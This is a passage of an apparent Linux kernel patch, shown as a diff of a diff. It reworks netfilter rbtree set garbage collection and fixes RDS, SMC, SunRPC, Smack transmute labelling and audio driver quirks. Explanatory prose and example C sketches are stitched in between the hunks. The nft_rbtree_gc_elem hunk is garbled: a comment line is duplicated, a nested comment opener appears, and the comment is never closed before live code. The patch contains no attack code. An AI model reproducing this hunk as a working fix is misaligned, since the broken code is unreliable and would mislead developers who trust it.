+ 		elem.priv = e;
+ 
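
pipapo garbage-collects synchronously under the commit mutex, so it skips the dead-bit marking entirely: expired elements are deactivated and unlinked on the spot, and full batches go straight to call_rcu() via nft_trans_gc_queue_sync() rather than through the work queue. A condensed sketch of the sync variant, with the backend removal step elided and names as in the helpers above:

static void example_sync_gc(struct nft_set *set)
{
	struct nft_trans_gc *gc;

	/* gc_seq 0: sync gc holds the commit mutex, no revalidation needed */
	gc = nft_trans_gc_alloc(set, 0, GFP_KERNEL);
	if (!gc)
		return;

	/*
	 * For each expired element: deactivate it and unlink it from the
	 * backend structure, then:
	 *
	 *	gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
	 *	if (!gc)
	 *		return;
	 *	nft_trans_gc_elem_add(gc, elem_priv);
	 */

	gc = nft_trans_gc_catchall_sync(gc);
	if (gc)
		nft_trans_gc_queue_sync_done(gc);	/* frees via call_rcu() */
}
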
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 8d73fffd2d09d..487572dcd6144 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -46,6 +46,12 @@ static int nft_rbtree_cmp(const struct nft_set *set,
+ 		      set->klen);
+ }
+ 
++static bool nft_rbtree_elem_expired(const struct nft_rbtree_elem *rbe)
++{
++	return nft_set_elem_expired(&rbe->ext) ||
++	       nft_set_elem_is_dead(&rbe->ext);
++}
++
+ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set,
+ 				const u32 *key, const struct nft_set_ext **ext,
+ 				unsigned int seq)
+@@ -80,7 +86,7 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 				continue;
+ 			}
+ 
+-			if (nft_set_elem_expired(&rbe->ext))
++			if (nft_rbtree_elem_expired(rbe))
+ 				return false;
+ 
+ 			if (nft_rbtree_interval_end(rbe)) {
+@@ -98,7 +104,7 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 
+ 	if (set->flags & NFT_SET_INTERVAL && interval != NULL &&
+ 	    nft_set_elem_active(&interval->ext, genmask) &&
+-	    !nft_set_elem_expired(&interval->ext) &&
++	    !nft_rbtree_elem_expired(interval) &&
+ 	    nft_rbtree_interval_start(interval)) {
+ 		*ext = &interval->ext;
+ 		return true;
+@@ -215,6 +221,18 @@ static void *nft_rbtree_get(const struct net *net, const struct nft_set *set,
+ 	return rbe;
+ }
+ 
++static void nft_rbtree_gc_remove(struct net *net, struct nft_set *set,
++				 struct nft_rbtree *priv,
++				 struct nft_rbtree_elem *rbe)
++{
++	struct nft_set_elem elem = {
++		.priv	= rbe,
++	};
++
++	nft_setelem_data_deactivate(net, set, &elem);
++	rb_erase(&rbe->node, &priv->root);
++}
++
+ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 			      struct nft_rbtree *priv,
+ 			      struct nft_rbtree_elem *rbe,
+@@ -222,11 +240,12 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
++	struct net *net = read_pnet(&set->net);
+ 	struct nft_rbtree_elem *rbe_prev;
+-	struct nft_set_gc_batch *gcb;
++	struct nft_trans_gc *gc;
+ 
+-	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
+-	if (!gcb)
++	gc = nft_trans_gc_alloc(set, 0, GFP_ATOMIC);
++	if (!gc)
+ 		return -ENOMEM;
+ 
+ 	/* search for end interval coming before this element.
+@@ -244,17 +263,28 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 
+ 	if (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
++		nft_rbtree_gc_remove(net, set, priv, rbe_prev);
++
++		/* There is always room in this trans gc for this element,
++		/* There is always room in this trans gc for this element:
++		 * memory allocation never actually happens here, hence the
++		 * warning splat if it ever does. No need to set NFT_SET_ELEM_DEAD_BIT;
++		 * this is synchronous gc, which never fails.
++		gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++		if (WARN_ON_ONCE(!gc))
++			return -ENOMEM;
+ 
+-		rb_erase(&rbe_prev->node, &priv->root);
+-		atomic_dec(&set->nelems);
+-		nft_set_gc_batch_add(gcb, rbe_prev);
++		nft_trans_gc_elem_add(gc, rbe_prev);
+ 	}
+ 
+-	rb_erase(&rbe->node, &priv->root);
+-	atomic_dec(&set->nelems);
++	nft_rbtree_gc_remove(net, set, priv, rbe);
++	gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++	if (WARN_ON_ONCE(!gc))
++		return -ENOMEM;
++
++	nft_trans_gc_elem_add(gc, rbe);
+ 
+-	nft_set_gc_batch_add(gcb, rbe);
+-	nft_set_gc_batch_complete(gcb);
++	nft_trans_gc_queue_sync_done(gc);
+ 
+ 	return 0;
+ }
+@@ -282,6 +312,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree_elem *rbe, *rbe_le = NULL, *rbe_ge = NULL;
+ 	struct rb_node *node, *next, *parent, **p, *first = NULL;
+ 	struct nft_rbtree *priv = nft_set_priv(set);
++	u8 cur_genmask = nft_genmask_cur(net);
+ 	u8 genmask = nft_genmask_next(net);
+ 	int d, err;
+ 
+@@ -327,8 +358,11 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		if (!nft_set_elem_active(&rbe->ext, genmask))
+ 			continue;
+ 
+-		/* perform garbage collection to avoid bogus overlap reports. */
+-		if (nft_set_elem_expired(&rbe->ext)) {
++		/* perform garbage collection to avoid bogus overlap reports
++		 * but skip new elements in this transaction.
++		 */
++		if (nft_set_elem_expired(&rbe->ext) &&
++		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+ 			err = nft_rbtree_gc_elem(set, priv, rbe, genmask);
+ 			if (err < 0)
+ 				return err;
+@@ -482,7 +516,6 @@ static void nft_rbtree_activate(const struct net *net,
+ 	struct nft_rbtree_elem *rbe = elem->priv;
+ 
+ 	nft_set_elem_change_active(net, set, &rbe->ext);
+-	nft_set_elem_clear_busy(&rbe->ext);
+ }
+ 
+ static bool nft_rbtree_flush(const struct net *net,
+@@ -490,12 +523,9 @@ static bool nft_rbtree_flush(const struct net *net,
+ {
+ 	struct nft_rbtree_elem *rbe = priv;
+ 
+-	if (!nft_set_elem_mark_busy(&rbe->ext) ||
+-	    !nft_is_active(net, &rbe->ext)) {
+-		nft_set_elem_change_active(net, set, &rbe->ext);
+-		return true;
+-	}
+-	return false;
++	nft_set_elem_change_active(net, set, &rbe->ext);
++
++	return true;
+ }
+ 
+ static void *nft_rbtree_deactivate(const struct net *net,
+@@ -552,8 +582,6 @@ static void nft_rbtree_walk(const struct nft_ctx *ctx,
+ 
+ 		if (iter->count < iter->skip)
+ 			goto cont;
+-		if (nft_set_elem_expired(&rbe->ext))
+-			goto cont;
+ 		if (!nft_set_elem_active(&rbe->ext, iter->genmask))
+ 			goto cont;
+ 
+@@ -572,26 +600,42 @@ cont:
+ 
+ static void nft_rbtree_gc(struct work_struct *work)
+ {
+-	struct nft_rbtree_elem *rbe, *rbe_end = NULL, *rbe_prev = NULL;
+-	struct nft_set_gc_batch *gcb = NULL;
++	struct nft_rbtree_elem *rbe, *rbe_end = NULL;
++	struct nftables_pernet *nft_net;
+ 	struct nft_rbtree *priv;
++	struct nft_trans_gc *gc;
+ 	struct rb_node *node;
+ 	struct nft_set *set;
++	unsigned int gc_seq;
+ 	struct net *net;
+-	u8 genmask;
+ 
+ 	priv = container_of(work, struct nft_rbtree, gc_work.work);
+ 	set  = nft_set_container_of(priv);
+ 	net  = read_pnet(&set->net);
+-	genmask = nft_genmask_cur(net);
++	nft_net = nft_pernet(net);
++	gc_seq  = READ_ONCE(nft_net->gc_seq);
+ 
+-	write_lock_bh(&priv->lock);
+-	write_seqcount_begin(&priv->count);
++	if (nft_set_gc_is_pending(set))
++		goto done;
++
++	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
++	if (!gc)
++		goto done;
++
++	read_lock_bh(&priv->lock);
+ 	for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
++
++		/* Ruleset has been updated, try later. */
++		if (READ_ONCE(nft_net->gc_seq) != gc_seq) {
++			nft_trans_gc_destroy(gc);
++			gc = NULL;
++			goto try_later;
++		}
++
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
+-		if (!nft_set_elem_active(&rbe->ext, genmask))
+-			continue;
++		if (nft_set_elem_is_dead(&rbe->ext))
++			goto dead_elem;
+ 
+ 		/* elements are reversed in the rbtree for historical reasons,
+ 		 * from highest to lowest value, that is why end element is
+@@ -604,46 +648,35 @@ static void nft_rbtree_gc(struct work_struct *work)
+ 		if (!nft_set_elem_expired(&rbe->ext))
+ 			continue;
+ 
+-		if (nft_set_elem_mark_busy(&rbe->ext)) {
+-			rbe_end = NULL;
++		nft_set_elem_dead(&rbe->ext);
++
++		if (!rbe_end)
+ 			continue;
+-		}
+ 
+-		if (rbe_prev) {
+-			rb_erase(&rbe_prev->node, &priv->root);
+-			rbe_prev = NULL;
+-		}
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (!gcb)
+-			break;
++		nft_set_elem_dead(&rbe_end->ext);
+ 
+-		atomic_dec(&set->nelems);
+-		nft_set_gc_batch_add(gcb, rbe);
+-		rbe_prev = rbe;
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++		if (!gc)
++			goto try_later;
+ 
+-		if (rbe_end) {
+-			atomic_dec(&set->nelems);
+-			nft_set_gc_batch_add(gcb, rbe_end);
+-			rb_erase(&rbe_end->node, &priv->root);
+-			rbe_end = NULL;
+-		}
+-		node = rb_next(node);
+-		if (!node)
+-			break;
+-	}
+-	if (rbe_prev)
+-		rb_erase(&rbe_prev->node, &priv->root);
+-	write_seqcount_end(&priv->count);
+-	write_unlock_bh(&priv->lock);
++		nft_trans_gc_elem_add(gc, rbe_end);
++		rbe_end = NULL;
++dead_elem:
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++		if (!gc)
++			goto try_later;
+ 
+-	rbe = nft_set_catchall_gc(set);
+-	if (rbe) {
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (gcb)
+-			nft_set_gc_batch_add(gcb, rbe);
++		nft_trans_gc_elem_add(gc, rbe);
+ 	}
+-	nft_set_gc_batch_complete(gcb);
+ 
++	gc = nft_trans_gc_catchall_async(gc, gc_seq);
++
++try_later:
++	read_unlock_bh(&priv->lock);
++
++	if (gc)
++		nft_trans_gc_queue_async_done(gc);
++done:
+ 	queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
+ 			   nft_set_gc_interval(set));
+ }
+diff --git a/net/rds/rdma_transport.c b/net/rds/rdma_transport.c
+index d36f3f6b43510..b15cf316b23a2 100644
+--- a/net/rds/rdma_transport.c
++++ b/net/rds/rdma_transport.c
+@@ -86,11 +86,13 @@ static int rds_rdma_cm_event_handler_cmn(struct rdma_cm_id *cm_id,
+ 		break;
+ 
+ 	case RDMA_CM_EVENT_ADDR_RESOLVED:
+-		rdma_set_service_type(cm_id, conn->c_tos);
+-		rdma_set_min_rnr_timer(cm_id, IB_RNR_TIMER_000_32);
+-		/* XXX do we need to clean up if this fails? */
+-		ret = rdma_resolve_route(cm_id,
+-					 RDS_RDMA_RESOLVE_TIMEOUT_MS);
++		if (conn) {
++			rdma_set_service_type(cm_id, conn->c_tos);
++			rdma_set_min_rnr_timer(cm_id, IB_RNR_TIMER_000_32);
++			/* XXX do we need to clean up if this fails? */
++			ret = rdma_resolve_route(cm_id,
++						 RDS_RDMA_RESOLVE_TIMEOUT_MS);
++		}
+ 		break;
+ 
+ 	case RDMA_CM_EVENT_ROUTE_RESOLVED:
+diff --git a/net/smc/smc_stats.h b/net/smc/smc_stats.h
+index 84b7ecd8c05ca..4dbc237b7c19e 100644
+--- a/net/smc/smc_stats.h
++++ b/net/smc/smc_stats.h
+@@ -244,8 +244,9 @@ while (0)
+ #define SMC_STAT_SERV_SUCC_INC(net, _ini) \
+ do { \
+ 	typeof(_ini) i = (_ini); \
+-	bool is_v2 = (i->smcd_version & SMC_V2); \
+ 	bool is_smcd = (i->is_smcd); \
++	u8 version = is_smcd ? i->smcd_version : i->smcr_version; \
++	bool is_v2 = (version & SMC_V2); \
+ 	typeof(net->smc.smc_stats) smc_stats = (net)->smc.smc_stats; \
+ 	if (is_v2 && is_smcd) \
+ 		this_cpu_inc(smc_stats->smc[SMC_TYPE_D].srv_v2_succ_cnt); \
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index b0258507b236c..2b803383c7b31 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2462,8 +2462,7 @@ call_status(struct rpc_task *task)
+ 		goto out_exit;
+ 	}
+ 	task->tk_action = call_encode;
+-	if (status != -ECONNRESET && status != -ECONNABORTED)
+-		rpc_check_timeout(task);
++	rpc_check_timeout(task);
+ 	return;
+ out_exit:
+ 	rpc_call_rpcerror(task, status);
+@@ -2736,6 +2735,7 @@ out_msg_denied:
+ 	case rpc_autherr_rejectedverf:
+ 	case rpcsec_gsserr_credproblem:
+ 	case rpcsec_gsserr_ctxproblem:
++		rpcauth_invalcred(task);
+ 		if (!task->tk_cred_retry)
+ 			break;
+ 		task->tk_cred_retry--;
+@@ -2889,19 +2889,22 @@ static const struct rpc_call_ops rpc_cb_add_xprt_call_ops = {
+  * @clnt: pointer to struct rpc_clnt
+  * @xps: pointer to struct rpc_xprt_switch,
+  * @xprt: pointer struct rpc_xprt
+- * @dummy: unused
++ * @in_max_connect: pointer to the max_connect value for the passed in xprt transport
+  */
+ int rpc_clnt_test_and_add_xprt(struct rpc_clnt *clnt,
+ 		struct rpc_xprt_switch *xps, struct rpc_xprt *xprt,
+-		void *dummy)
++		void *in_max_connect)
+ {
+ 	struct rpc_cb_add_xprt_calldata *data;
+ 	struct rpc_task *task;
++	int max_connect = clnt->cl_max_connect;
+ 
+-	if (xps->xps_nunique_destaddr_xprts + 1 > clnt->cl_max_connect) {
++	if (in_max_connect)
++		max_connect = *(int *)in_max_connect;
++	if (xps->xps_nunique_destaddr_xprts + 1 > max_connect) {
+ 		rcu_read_lock();
+ 		pr_warn("SUNRPC: reached max allowed number (%d) did not add "
+-			"transport to server: %s\n", clnt->cl_max_connect,
++			"transport to server: %s\n", max_connect,
+ 			rpc_peeraddr2str(clnt, RPC_DISPLAY_ADDR));
+ 		rcu_read_unlock();
+ 		return -EINVAL;
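
With the void * argument repurposed, a caller of rpc_clnt_test_and_add_xprt() can now cap an individual transport instead of always inheriting clnt->cl_max_connect. A hypothetical call site; only the function and its new argument come from the patch, the wrapper is illustrative:

/* Hypothetical helper: add a transport with its own connection limit. */
static int add_one_xprt(struct rpc_clnt *clnt, struct rpc_xprt_switch *xps,
			struct rpc_xprt *xprt, int xprt_max_connect)
{
	/* passing NULL instead keeps the old clnt->cl_max_connect behaviour */
	return rpc_clnt_test_and_add_xprt(clnt, xps, xprt, &xprt_max_connect);
}
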
+diff --git a/security/smack/smack.h b/security/smack/smack.h
+index e2239be7bd60a..aa15ff56ed6e7 100644
+--- a/security/smack/smack.h
++++ b/security/smack/smack.h
+@@ -120,6 +120,7 @@ struct inode_smack {
+ struct task_smack {
+ 	struct smack_known	*smk_task;	/* label for access control */
+ 	struct smack_known	*smk_forked;	/* label when forked */
++	struct smack_known	*smk_transmuted;/* label when transmuted */
+ 	struct list_head	smk_rules;	/* per task access rules */
+ 	struct mutex		smk_rules_lock;	/* lock for the rules */
+ 	struct list_head	smk_relabel;	/* transit allowed labels */
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index 67dcd31cd3f3d..cd6a03e945eb7 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -999,8 +999,9 @@ static int smack_inode_init_security(struct inode *inode, struct inode *dir,
+ 				     const struct qstr *qstr, const char **name,
+ 				     void **value, size_t *len)
+ {
++	struct task_smack *tsp = smack_cred(current_cred());
+ 	struct inode_smack *issp = smack_inode(inode);
+-	struct smack_known *skp = smk_of_current();
++	struct smack_known *skp = smk_of_task(tsp);
+ 	struct smack_known *isp = smk_of_inode(inode);
+ 	struct smack_known *dsp = smk_of_inode(dir);
+ 	int may;
+@@ -1009,20 +1010,34 @@ static int smack_inode_init_security(struct inode *inode, struct inode *dir,
+ 		*name = XATTR_SMACK_SUFFIX;
+ 
+ 	if (value && len) {
+-		rcu_read_lock();
+-		may = smk_access_entry(skp->smk_known, dsp->smk_known,
+-				       &skp->smk_rules);
+-		rcu_read_unlock();
++		/*
++		 * If equal, transmuting already occurred in
++		 * smack_dentry_create_files_as(). No need to check again.
++		 */
++		if (tsp->smk_task != tsp->smk_transmuted) {
++			rcu_read_lock();
++			may = smk_access_entry(skp->smk_known, dsp->smk_known,
++					       &skp->smk_rules);
++			rcu_read_unlock();
++		}
+ 
+ 		/*
+-		 * If the access rule allows transmutation and
+-		 * the directory requests transmutation then
+-		 * by all means transmute.
++		 * In addition to having smk_task equal to smk_transmuted,
++		 * if the access rule allows transmutation and the directory
++		 * requests transmutation then by all means transmute.
+ 		 * Mark the inode as changed.
+ 		 */
+-		if (may > 0 && ((may & MAY_TRANSMUTE) != 0) &&
+-		    smk_inode_transmutable(dir)) {
+-			isp = dsp;
++		if ((tsp->smk_task == tsp->smk_transmuted) ||
++		    (may > 0 && ((may & MAY_TRANSMUTE) != 0) &&
++		     smk_inode_transmutable(dir))) {
++			/*
++			 * The caller of smack_dentry_create_files_as()
++			 * should have overridden the current cred, so the
++			 * inode label was already set correctly in
++			 * smack_inode_alloc_security().
++			 */
++			if (tsp->smk_task != tsp->smk_transmuted)
++				isp = dsp;
+ 			issp->smk_flags |= SMK_INODE_CHANGED;
+ 		}
+ 
+@@ -1461,10 +1476,19 @@ static int smack_inode_getsecurity(struct user_namespace *mnt_userns,
+ 	struct super_block *sbp;
+ 	struct inode *ip = (struct inode *)inode;
+ 	struct smack_known *isp;
++	struct inode_smack *ispp;
++	size_t label_len;
++	char *label = NULL;
+ 
+-	if (strcmp(name, XATTR_SMACK_SUFFIX) == 0)
++	if (strcmp(name, XATTR_SMACK_SUFFIX) == 0) {
+ 		isp = smk_of_inode(inode);
+-	else {
++	} else if (strcmp(name, XATTR_SMACK_TRANSMUTE) == 0) {
++		ispp = smack_inode(inode);
++		if (ispp->smk_flags & SMK_INODE_TRANSMUTE)
++			label = TRANS_TRUE;
++		else
++			label = "";
++	} else {
+ 		/*
+ 		 * The rest of the Smack xattrs are only on sockets.
+ 		 */
+@@ -1486,13 +1510,18 @@ static int smack_inode_getsecurity(struct user_namespace *mnt_userns,
+ 			return -EOPNOTSUPP;
+ 	}
+ 
++	if (!label)
++		label = isp->smk_known;
++
++	label_len = strlen(label);
++
+ 	if (alloc) {
+-		*buffer = kstrdup(isp->smk_known, GFP_KERNEL);
++		*buffer = kstrdup(label, GFP_KERNEL);
+ 		if (*buffer == NULL)
+ 			return -ENOMEM;
+ 	}
+ 
+-	return strlen(isp->smk_known);
++	return label_len;
+ }
+ 
+ 
+@@ -4750,8 +4779,10 @@ static int smack_dentry_create_files_as(struct dentry *dentry, int mode,
+ 		 * providing access is transmuting use the containing
+ 		 * directory label instead of the process label.
+ 		 */
+-		if (may > 0 && (may & MAY_TRANSMUTE))
++		if (may > 0 && (may & MAY_TRANSMUTE)) {
+ 			ntsp->smk_task = isp->smk_inode;
++			ntsp->smk_transmuted = ntsp->smk_task;
++		}
+ 	}
+ 	return 0;
+ }
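
The smack_inode_getsecurity() hunk makes the transmute flag readable through the regular xattr interface: "TRUE" for a transmuting directory, the empty string otherwise. A small userspace sketch, assuming the conventional security.SMACK64TRANSMUTE attribute name:

#include <stdio.h>
#include <sys/xattr.h>

int main(int argc, char **argv)
{
	char buf[16] = "";
	ssize_t len;

	if (argc != 2) {
		fprintf(stderr, "usage: %s <directory>\n", argv[0]);
		return 1;
	}

	/* returns "TRUE" if the directory transmutes, "" otherwise */
	len = getxattr(argv[1], "security.SMACK64TRANSMUTE",
		       buf, sizeof(buf) - 1);
	if (len < 0) {
		perror("getxattr");
		return 1;
	}
	buf[len] = '\0';
	printf("%s: transmute=%s\n", argv[1], buf);
	return 0;
}
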
+diff --git a/sound/hda/intel-sdw-acpi.c b/sound/hda/intel-sdw-acpi.c
+index 5cb92f7ccbcac..b57d72ea4503f 100644
+--- a/sound/hda/intel-sdw-acpi.c
++++ b/sound/hda/intel-sdw-acpi.c
+@@ -23,7 +23,7 @@ static int ctrl_link_mask;
+ module_param_named(sdw_link_mask, ctrl_link_mask, int, 0444);
+ MODULE_PARM_DESC(sdw_link_mask, "Intel link mask (one bit per link)");
+ 
+-static bool is_link_enabled(struct fwnode_handle *fw_node, int i)
++static bool is_link_enabled(struct fwnode_handle *fw_node, u8 idx)
+ {
+ 	struct fwnode_handle *link;
+ 	char name[32];
+@@ -31,7 +31,7 @@ static bool is_link_enabled(struct fwnode_handle *fw_node, int i)
+ 
+ 	/* Find master handle */
+ 	snprintf(name, sizeof(name),
+-		 "mipi-sdw-link-%d-subproperties", i);
++		 "mipi-sdw-link-%hhu-subproperties", idx);
+ 
+ 	link = fwnode_get_named_child_node(fw_node, name);
+ 	if (!link)
+@@ -51,8 +51,8 @@ static int
+ sdw_intel_scan_controller(struct sdw_intel_acpi_info *info)
+ {
+ 	struct acpi_device *adev = acpi_fetch_acpi_dev(info->handle);
+-	int ret, i;
+-	u8 count;
++	u8 count, i;
++	int ret;
+ 
+ 	if (!adev)
+ 		return -EINVAL;
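
The intel-sdw-acpi change narrows the loop counter to u8 and pairs it with the matching %hhu length modifier, keeping the format string consistent with the argument type instead of relying on integer promotion under %d. A tiny userspace illustration of the convention:

#include <stdio.h>

int main(void)
{
	unsigned char idx = 3;	/* stands in for the kernel's u8 */
	char name[32];

	/* %hhu is the unsigned char conversion, matching idx exactly */
	snprintf(name, sizeof(name),
		 "mipi-sdw-link-%hhu-subproperties", idx);
	puts(name);
	return 0;
}
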
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 3226691ac923c..54f4b593a1158 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2208,6 +2208,7 @@ static const struct snd_pci_quirk power_save_denylist[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2068, "Intel NUC7i3BNB", 0),
+ 	/* https://bugzilla.kernel.org/show_bug.cgi?id=198611 */
+ 	SND_PCI_QUIRK(0x17aa, 0x2227, "Lenovo X1 Carbon 3rd Gen", 0),
++	SND_PCI_QUIRK(0x17aa, 0x316e, "Lenovo ThinkCentre M70q", 0),
+ 	/* https://bugzilla.redhat.com/show_bug.cgi?id=1689623 */
+ 	SND_PCI_QUIRK(0x17aa, 0x367b, "Lenovo IdeaCentre B550", 0),
+ 	/* https://bugzilla.redhat.com/show_bug.cgi?id=1572975 */
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f70e0ad81607e..57e07aa4e136c 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9657,7 +9657,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+-	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402ZA", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x16a3, "ASUS UX3402VA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
+ 	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 9a9571c3f08c0..533250efcbd83 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -213,6 +213,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21J6"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82TL"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82QF"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -220,6 +234,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82V2"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82UG"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/cs42l42.c b/sound/soc/codecs/cs42l42.c
+index 2fefbcf7bd130..735061690ded0 100644
+--- a/sound/soc/codecs/cs42l42.c
++++ b/sound/soc/codecs/cs42l42.c
+@@ -2280,6 +2280,16 @@ int cs42l42_common_probe(struct cs42l42_private *cs42l42,
+ 
+ 	if (cs42l42->reset_gpio) {
+ 		dev_dbg(cs42l42->dev, "Found reset GPIO\n");
++
++		/*
++		 * ACPI can override the default GPIO state we requested
++		 * so ensure that we start with RESET low.
++		 */
++		gpiod_set_value_cansleep(cs42l42->reset_gpio, 0);
++
++		/* Ensure minimum reset pulse width */
++		usleep_range(10, 500);
++
+ 		gpiod_set_value_cansleep(cs42l42->reset_gpio, 1);
+ 	}
+ 	usleep_range(CS42L42_BOOT_TIME_US, CS42L42_BOOT_TIME_US * 2);
+diff --git a/sound/soc/codecs/rt5640.c b/sound/soc/codecs/rt5640.c
+index a7071d0a2562f..37ea4d854cb58 100644
+--- a/sound/soc/codecs/rt5640.c
++++ b/sound/soc/codecs/rt5640.c
+@@ -2562,10 +2562,9 @@ static void rt5640_enable_jack_detect(struct snd_soc_component *component,
+ 	if (jack_data && jack_data->use_platform_clock)
+ 		rt5640->use_platform_clock = jack_data->use_platform_clock;
+ 
+-	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
+-					NULL, rt5640_irq,
+-					IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
+-					"rt5640", rt5640);
++	ret = request_irq(rt5640->irq, rt5640_irq,
++			  IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
++			  "rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to request IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640_disable_jack_detect(component);
+@@ -2618,14 +2617,14 @@ static void rt5640_enable_hda_jack_detect(
+ 
+ 	rt5640->jack = jack;
+ 
+-	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
+-					NULL, rt5640_irq, IRQF_TRIGGER_RISING | IRQF_ONESHOT,
+-					"rt5640", rt5640);
++	ret = request_irq(rt5640->irq, rt5640_irq,
++			  IRQF_TRIGGER_RISING | IRQF_ONESHOT, "rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to request IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640->irq = -ENXIO;
+ 		return;
+ 	}
++	rt5640->irq_requested = true;
+ 
+ 	/* sync initial jack state */
+ 	queue_delayed_work(system_long_wq, &rt5640->jack_work, 0);
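
Replacing devm_request_threaded_irq() with plain request_irq() makes the jack-detect code own the IRQ lifetime explicitly; devm would only release the handler at driver unbind, which does not fit paths that can enable and disable jack detection repeatedly. A minimal sketch of the explicit pairing this implies; the free side is assumed to live in the disable path, which is outside these hunks:

static int example_enable_jack_irq(struct rt5640_priv *rt5640)
{
	int ret;

	ret = request_irq(rt5640->irq, rt5640_irq,
			  IRQF_TRIGGER_RISING | IRQF_ONESHOT,
			  "rt5640", rt5640);
	if (ret)
		return ret;
	rt5640->irq_requested = true;
	return 0;
}

static void example_disable_jack_irq(struct rt5640_priv *rt5640)
{
	/* assumed counterpart: free only if we actually requested the line */
	if (rt5640->irq_requested) {
		free_irq(rt5640->irq, rt5640);
		rt5640->irq_requested = false;
	}
}
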
+diff --git a/sound/soc/fsl/imx-audmix.c b/sound/soc/fsl/imx-audmix.c
+index d8e99b263ab21..cbe24d5b4e46a 100644
+--- a/sound/soc/fsl/imx-audmix.c
++++ b/sound/soc/fsl/imx-audmix.c
+@@ -320,7 +320,7 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->cpu_mclk)) {
